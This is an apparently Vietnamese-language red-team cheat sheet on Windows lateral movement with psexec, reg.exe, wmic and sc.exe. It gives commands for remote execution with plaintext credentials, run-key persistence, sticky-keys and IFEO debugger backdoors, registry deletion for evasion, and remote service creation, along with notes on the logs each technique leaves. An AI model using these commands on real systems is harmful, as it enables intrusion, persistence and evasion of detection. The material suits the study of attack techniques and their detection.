Windows component
psexec.exe
Port
135, 445, 4915x/TCP
Credentials
Cleartext
Share
Cần writable share
Sử dụng cơ bản
PsExec.exe -u doamin\user -p password \\IP -i cmdKết quả
Ở máy victim ta sẽ thấy file PSEXESVC được tạo ở ADMIN$ share (lí do vì sao cần writeable share)
Ta sẽ thấy exe này được thực thi qua service để handle remote cmd
Khi exit session thì file PSEXESVC.exe và service PSEXESVC bị xóa
reg.exe
Port
445
Credentials
Cleartext
Share
Không cần
Đầu tiên ta cần chạy runas với creden của victim
runas /user:domain\user cmdCâu lệnh sẽ spawn cmd mới, ta sẽ remote set reg với cmd mới này
Remote set startup program
reg.exe add \\IP\HKLM\software\microsoft\windows\currentversion\run /v testprog /t REG_SZ /d "calc"Remote set program launch handler
reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t reg_sz /d "calc"Backdoor in RDP
reg.exe add "\\IP\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t reg_sz /d "calc"Evasion
reg.exe delete \\IP\HKLM\... /v <key_nhame> /fwmic.exe
Port
135, 4915x/TCP
Credentials
Cleartext
Share
Không cần
Sử dụng cơ bản
wmic.exe /user:domain\user /password:password /node:IP process call create 'calc'Tại log Sysmon ta sẽ thấy calc.exe được spawn bởi WmiPrvSE.exe
sc.exe
Port
135, 4915x/TCP
Credentials
Cleartext
Share
Không cần
Sử dụng cơ bản
sc.exe \\IP create serviceName binPath= "cmd /c calc" start= auto
sc.exe \\IP start serviceNameTạo service từ xa và kích hoạt để thực thi cmd. Tại victim ta sẽ thấy logs tạo service
Last updated